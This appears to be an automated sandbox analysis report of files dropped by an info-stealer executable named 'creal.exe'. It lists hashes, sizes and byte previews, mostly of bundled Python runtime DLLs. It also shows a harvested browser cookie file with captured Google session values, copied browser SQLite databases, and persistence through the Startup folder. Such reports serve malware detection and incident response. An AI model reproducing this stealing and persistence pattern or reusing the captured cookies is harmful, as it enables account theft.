                                                                                                                                                                                                              Preview:importlib_metadata-7.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-7.0.1.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-7.0.1.dist-info/METADATA,sha256=YvsDzB194dUN5E1AWwcIMCsS9MzX_SFtmuiGPcp2emc,4926..importlib_metadata-7.0.1.dist-info/RECORD,,..importlib_metadata-7.0.1.dist-info/WHEEL,sha256=oiQVh_5PnQM0E3gPdiz09WCNmwiHDMaGer_elqB3coM,92..importlib_metadata-7.0.1.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=CrDhGQz3SCK5Cct82OvmGzqzOqneJn3jLvvfmSx8nCs,31551..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycache__/_functools.cpython-312.pyc,,..importlib_metadata/__pycache__/_itertools.cpython-312.pyc,,..imp

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\importlib_metadata-7.0.1.dist-info\WHEEL

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                              Entropy (8bit):4.8343614255301075
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tPCCfA5S:RtBMwlVCxWBBf
                                                                                                                                                                                                              MD5:A227BF38FB17005B3BDB56CCC428B1BB
                                                                                                                                                                                                              SHA1:502F95DA3089549E19C451737AA262E45C5BC3BC
                                                                                                                                                                                                              SHA-256:A2241587FE4F9D033413780F762CF4F5608D9B08870CC6867ABFDE96A0777283
                                                                                                                                                                                                              SHA-512:A0BA37A0B2F3D4AE1EE2B09BB13ED20912DB4E6A009FE9BA9414830AD4FDBF58571E195ABBE0D19F5582E2CF958CFB49FFDACD7C5182008699F92A0F5EEC6C41
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: true.Tag: py3-none-any..

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\importlib_metadata-7.0.1.dist-info\top_level.txt

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19
                                                                                                                                                                                                              Entropy (8bit):3.536886723742169
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:JSej0EBERG:50o4G
                                                                                                                                                                                                              MD5:A24465F7850BA59507BF86D89165525C
                                                                                                                                                                                                              SHA1:4E61F9264DE74783B5924249BCFE1B06F178B9AD
                                                                                                                                                                                                              SHA-256:08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
                                                                                                                                                                                                              SHA-512:ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:importlib_metadata.

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\libcrypto-3.dll

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5162776
                                                                                                                                                                                                              Entropy (8bit):5.958207976652471
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:98304:S3+FRtLtlVriXpshX179Cahd4tC9P1+1CPwDvt3uFlDCi:ASRtLtvd99Cahd4tC9w1CPwDvt3uFlDz
                                                                                                                                                                                                              MD5:51E8A5281C2092E45D8C97FBDBF39560
                                                                                                                                                                                                              SHA1:C499C810ED83AAADCE3B267807E593EC6B121211
                                                                                                                                                                                                              SHA-256:2A234B5AA20C3FAECF725BBB54FB33F3D94543F78FA7045408E905593E49960A
                                                                                                                                                                                                              SHA-512:98B91719B0975CB38D3B3C7B6F820D184EF1B64D38AD8515BE0B8B07730E2272376B9E51631FE9EFD9B8A1709FEA214CF3F77B34EEB9FD282EB09E395120E7CB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d...x..e.........." ...#..6..*......v.........................................O.......O...`.........................................0.G.0.....M.@....0N.|.....K.\.....N../...@N.....PsC.8............................qC.@.............M..............................text...4.6.......6................. ..`.rdata..`.....6.......6.............@..@.data....n....J..<....J.............@....pdata........K.......J.............@..@.idata...%....M..&....M.............@..@.00cfg..u.... N.......M.............@..@.rsrc...|....0N.......M.............@..@.reloc..k....@N.......M.............@..B................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\libffi-8.dll

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):39696
                                                                                                                                                                                                              Entropy (8bit):6.641880464695502
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                              MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                              SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                              SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                              SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\libssl-3.dll

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):790296
                                                                                                                                                                                                              Entropy (8bit):5.607732992846443
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:7aO1lo7USZGjweMMHO4+xuVg7gCl2VdhMd1DdwMVn4TERUr3zgKpJJ/wknofFe9A:FkeMKOr97gCAE35gEGzLpwknofFe9XbE
                                                                                                                                                                                                              MD5:BFC834BB2310DDF01BE9AD9CFF7C2A41
                                                                                                                                                                                                              SHA1:FB1D601B4FCB29FF1B13B0D2ED7119BD0472205C
                                                                                                                                                                                                              SHA-256:41AD1A04CA27A7959579E87FBBDA87C93099616A64A0E66260C983381C5570D1
                                                                                                                                                                                                              SHA-512:6AF473C7C0997F2847EBE7CEE8EF67CD682DEE41720D4F268964330B449BA71398FDA8954524F9A97CC4CDF9893B8BDC7A1CF40E9E45A73F4F35A37F31C6A9C3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T..T..T..].3.Z....V......V....X....\....P....W..T..I....e....U.._.U....U..RichT..........PE..d......e.........." ...#.6..........K........................................0.......w....`..........................................w...Q..............s.... ..pM......./......`... ...8...............................@............................................text....4.......6.................. ..`.rdata...y...P...z...:..............@..@.data....N.......H..................@....pdata..XV... ...X..................@..@.idata..bc.......d...T..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..?...........................@..B................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\pyexpat.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):199448
                                                                                                                                                                                                              Entropy (8bit):6.385306498353421
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:jJB/b2LOWs5LS04q1uqtF+ai7dYbmdRLjDxKyw6XUWdRBIpLhCujk:dB6yx5LT1gqtF+XGeL/xiBoR4g
                                                                                                                                                                                                              MD5:E2D1C738D6D24A6DD86247D105318576
                                                                                                                                                                                                              SHA1:384198F20724E4EDE9E7B68E2D50883C664EEE49
                                                                                                                                                                                                              SHA-256:CDC09FBAE2F103196215FACD50D108BE3EFF60C8EE5795DCC80BF57A0F120CDF
                                                                                                                                                                                                              SHA-512:3F9CB64B4456438DEA82A0638E977F233FAF0A08433F01CA87BA65C7E80B0680B0EC3009FA146F02AE1FDCC56271A66D99855D222E77B59A1713CAF952A807DA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W,.6B..6B..6B..N..6B..IC..6B..IG..6B..IF..6B..IA..6B...C..6B..NC..6B..6C..6B...O..6B...B..6B......6B...@..6B.Rich.6B.........PE..d....Are.........." ...%............0................................................p....`......................................... ...P...p............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata..D.... ......................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\python3.dll

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):68376
                                                                                                                                                                                                              Entropy (8bit):6.148687003588085
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:/BV1EbYGVXq6KC/prVHBN0cW18itCQDFPnOMFn+gikF/nFX14uewjBcCCC0yamM8:pDmF61JFn+/OJBIpL0j7Sy5xH
                                                                                                                                                                                                              MD5:4038AF0427BCE296CA8F3E98591E0723
                                                                                                                                                                                                              SHA1:B2975225721959D87996454D049E6D878994CBF2
                                                                                                                                                                                                              SHA-256:A5BB3EB6FDFD23E0D8B2E4BCCD6016290C013389E06DAAE6CB83964FA69E2A4F
                                                                                                                                                                                                              SHA-512:DB762442C6355512625B36F112ECA6923875D10AAF6476D79DC6F6FFC9114E8C7757AC91DBCD1FB00014122BC7F656115160CF5D62FA7FA1BA70BC71346C1AD3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T...5e..5e..5e..m..5e..e..5e.....5e..g..5e.Rich.5e.........PE..d....Are.........." ...%..................................................................`.........................................`...H................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\python312.dll

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7003928
                                                                                                                                                                                                              Entropy (8bit):5.780799677504345
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:98304:2OUmnjqB6bHMYM3RNgqKutvDHDMiEtYkzuv:2OUmn+MnM3R+qYi3kzuv
                                                                                                                                                                                                              MD5:48EBFEFA21B480A9B0DBFC3364E1D066
                                                                                                                                                                                                              SHA1:B44A3A9B8C585B30897DDC2E4249DFCFD07B700A
                                                                                                                                                                                                              SHA-256:0CC4E557972488EB99EA4AEB3D29F3ADE974EF3BCD47C211911489A189A0B6F2
                                                                                                                                                                                                              SHA-512:4E6194F1C55B82EE41743B35D749F5D92A955B219DECACF9F1396D983E0F92AE02089C7F84A2B8296A3062AFA3F9C220DA9B7CD9ED01B3315EA4A953B4ECC6CE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............e..e..e.d..e....e.`..e.a..e.f..e....e..d..e..d...e.Bh.r.e.Be..e.B...e.Bg..e.Rich..e.................PE..d....Are.........." ...%..)..RB.....|X........................................k.......k...`......................................... .O.d....[P......@j.......`..Y....j../...Pj.4Z...3.T.....................I.(.....3.@............0)..............................text...v.).......)................. ..`.rdata...P'..0)..R'...).............@..@.data....<....P......nP.............@....pdata...Y....`..Z...._.............@..@PyRuntim.....0c......Hb.............@....rsrc........@j......Ji.............@..@.reloc..4Z...Pj..\...Ti.............@..B................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\pywin32_system32\pywintypes312.dll

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):134656
                                                                                                                                                                                                              Entropy (8bit):5.9953900911096785
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:Yuh2G0a2fYrFceQaVK756Y/r06trvoEKQAe7KL8KJKVKGajt4:Yuh2faiYrFceQaVfY/rxTBAe7KwKwVrE
                                                                                                                                                                                                              MD5:26D752C8896B324FFD12827A5E4B2808
                                                                                                                                                                                                              SHA1:447979FA03F78CB7210A4E4BA365085AB2F42C22
                                                                                                                                                                                                              SHA-256:BD33548DBDBB178873BE92901B282BAD9C6817E3EAC154CA50A666D5753FD7EC
                                                                                                                                                                                                              SHA-512:99C87AB9920E79A03169B29A2F838D568CA4D4056B54A67BC51CAF5C0FF5A4897ED02533BA504F884C6F983EBC400743E6AD52AC451821385B1E25C3B1EBCEE0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.$g..wg..wg..wn.[wk..w5..vc..w..5wf..w5..vs..w5..vo..w5..vd..ws..vf..w...ve..ws..vl..wg..w...w...vj..w...vf..w...vf..wRichg..w........PE..d......d.........." ................L........................................P............`......................................... u..`B......,....0..l.......L............@..0...`Q..T............................Q..8............................................text............................... ..`.rdata..R...........................@..@.data....-.......(..................@....pdata..L...........................@..@.rsrc...l....0......................@..@.reloc..0....@......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\select.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):30488
                                                                                                                                                                                                              Entropy (8bit):6.584443317757654
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:OyLTFInPLnIloHqP3DT90IBIpQG28HQIYiSy1pCQ5mrUAM+o/8E9VF0NyOYl:hinzfHqv1rBIpQG/5YiSyvkrUAMxkErl
                                                                                                                                                                                                              MD5:E1604AFE8244E1CE4C316C64EA3AA173
                                                                                                                                                                                                              SHA1:99704D2C0FA2687997381B65FF3B1B7194220A73
                                                                                                                                                                                                              SHA-256:74CCA85600E7C17EA6532B54842E26D3CAE9181287CDF5A4A3C50AF4DAB785E5
                                                                                                                                                                                                              SHA-512:7BF35B1A9DA9F1660F238C2959B3693B7D9D2DA40CF42C6F9EBA2164B73047340D0ADFF8995049A2FE14E149EBA05A5974EEE153BADD9E8450F961207F0B3D42
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..t.s.'.s.'.s.'..7'.s.'...&.s.'...&.s.'...&.s.'...&.s.'(.&.s.'.s.'Ps.'Y..&.s.'(.&.s.'(.&.s.'(.['.s.'(.&.s.'Rich.s.'........PE..d....Are.........." ...%.....2............................................................`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\sqlite3.dll

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1500440
                                                                                                                                                                                                              Entropy (8bit):6.5886408023548295
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24576:ATqtyGkxOc+wv05tP5kf82Hr/74YPF5o/P/gnAracr7/24UcypY7w0vpZUFq++I:nk0jwv4tP5kf8ar/74EF2/An4acrVUc2
                                                                                                                                                                                                              MD5:31CD2695493E9B0669D7361D92D46D94
                                                                                                                                                                                                              SHA1:19C1BC5C3856665ECA5390A2F9CD59B564C0139B
                                                                                                                                                                                                              SHA-256:17D547994008F1626BE2877497912687CB3EBD9A407396804310FD12C85AEAD4
                                                                                                                                                                                                              SHA-512:9DD8D1B900999E8CEA91F3D5F3F72D510F9CC28D7C6768A4046A9D2AA9E78A6ACE1248EC9574F5F6E53A6F1BDBFDF153D9BF73DBA05788625B03398716C87E1C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......SJ...+...+...+...S...+...T...+...T...+...T...+...T...+..\S...+...+...+..-....+..-....+..-.n..+..-....+..Rich.+..................PE..d....Bre.........." ...%..................................................................`..........................................d...".............................../..........P...T...............................@...............@............................text...x........................... ..`.rdata..f...........................@..@.data....G.......>..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\unicodedata.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1137944
                                                                                                                                                                                                              Entropy (8bit):5.4622357236004175
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12288:PrEHdcM6hb1CjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfciA0:PrEXQCjfk7bPNfv42BN6yzUiA0
                                                                                                                                                                                                              MD5:FC47B9E23DDF2C128E3569A622868DBE
                                                                                                                                                                                                              SHA1:2814643B70847B496CBDA990F6442D8FF4F0CB09
                                                                                                                                                                                                              SHA-256:2A50D629895A05B10A262ACF333E7A4A31DB5CB035B70D14D1A4BE1C3E27D309
                                                                                                                                                                                                              SHA-512:7C08683820498FDFF5F1703DB4AD94AD15F2AA877D044EDDC4B54D90E7DC162F48B22828CD577C9BB1B56F7C11F777F9785A9DA1867BF8C0F2B6E75DC57C3F53
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........K..K..K..B.q.M..^..I..^..F..^..C..^..H..qE.H.....I..K.....qE.J..qE.J..qE..J..qE..J..RichK..........................PE..d....Are.........." ...%.>..........`*.......................................p...... A....`.........................................p...X............P.......@.........../...`......P^..T............................]..@............P..p............................text....=.......>.................. ..`.rdata..\....P.......B..............@..@.data...X.... ......................@....pdata.......@......................@..@.rsrc........P......."..............@..@.reloc.......`.......,..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75242\win32\win32api.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):133632
                                                                                                                                                                                                              Entropy (8bit):5.851293297484796
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:bPwB2zC1vwC3XetCf5RlRVFhLaNKPRyymoh5Lm9b0e:bIB2zkvwGXetCfDlRVlPRy85Lm9
                                                                                                                                                                                                              MD5:3A80FEA23A007B42CEF8E375FC73AD40
                                                                                                                                                                                                              SHA1:04319F7552EA968E2421C3936C3A9EE6F9CF30B2
                                                                                                                                                                                                              SHA-256:B70D69D25204381F19378E1BB35CC2B8C8430AA80A983F8D0E8E837050BB06EF
                                                                                                                                                                                                              SHA-512:A63BED03F05396B967858902E922B2FBFB4CF517712F91CFAA096FF0539CF300D6B9C659FFEE6BF11C28E79E23115FD6B9C0B1AA95DB1CBD4843487F060CCF40
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I^.f'..f'..f'......f'...&..f'...#..f'...$..f'.o.&..f'..."..f'...&..f'..f&..g'.o....f'.o.'..f'.o.%..f'.Rich.f'.................PE..d......d.........." .........................................................P............`..........................................................0..\....................@..$....v..T............................<..8............0..........@....................text...$........................... ..`.rdata......0......................@..@.data...x(......."..................@....pdata..............................@..@.rsrc...\....0......................@..@.reloc..$....@......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\crcookies.txt

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):275
                                                                                                                                                                                                              Entropy (8bit):5.83018576654272
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:Pk3rocHDyzxbyv3rocHDKJmJcrDSLukrTSSIGDRmEksDVD:c79EI798HSLLXAGDR+U
                                                                                                                                                                                                              MD5:58DA1C4E7D7343D729004021FFAE7C6A
                                                                                                                                                                                                              SHA1:6BE741E07C443633796C4194E8DA13CE00D29ACE
                                                                                                                                                                                                              SHA-256:C17B0513E4A8C848E478FC56778F7152516D7A32F68A3B6CB3CD44B33676CDB0
                                                                                                                                                                                                              SHA-512:13006D75D500FC455D3E2B26D4C4D8DEF694F73F0A20A01CC5D2C24C2BAA2019F503AEA0DBD8F096F97B8F52F5779AF746FEFCBB60AEE6A83FD71B2CE3C8CC1A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.google.com.TRUE./.FALSE.2597573456.1P_JAR.2023-10-05-09...google.com.TRUE./.FALSE.2597573456.NID.511=k9tT3q7Yfh1nx_FSl06F5UE_vdaFQreiGKe1aDN83MeveD7PL1RZXva4s-nFc9waQi9LtKavuTIba8MUkoGu58E8E81gwB_TWJ4Ng-LfCvzhem7rNrhZQ2aGvJZ9g2TYhqx2W2O4E7uHQzPk3vuLvMLxFXZsqE6NdAViQDECGpo..

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcrcqptdpet.db

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                              Entropy (8bit):1.1371207751183456
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
                                                                                                                                                                                                              MD5:643AC1E34BE0FDE5FA0CD279E476DF3A
                                                                                                                                                                                                              SHA1:241B9EA323D640B82E8085803CBE3F61FEEA458F
                                                                                                                                                                                                              SHA-256:C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
                                                                                                                                                                                                              SHA-512:73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcrcuthbrer.db

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                              Entropy (8bit):1.1371207751183456
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
                                                                                                                                                                                                              MD5:643AC1E34BE0FDE5FA0CD279E476DF3A
                                                                                                                                                                                                              SHA1:241B9EA323D640B82E8085803CBE3F61FEEA458F
                                                                                                                                                                                                              SHA-256:C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
                                                                                                                                                                                                              SHA-512:73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcrcwsychbq.db

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                              Entropy (8bit):0.8467337400211222
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
                                                                                                                                                                                                              MD5:7A03CC0EAD0AEFF210C3E60823AAA5EC
                                                                                                                                                                                                              SHA1:8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
                                                                                                                                                                                                              SHA-256:D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
                                                                                                                                                                                                              SHA-512:8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcrgdwfnclj.db

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
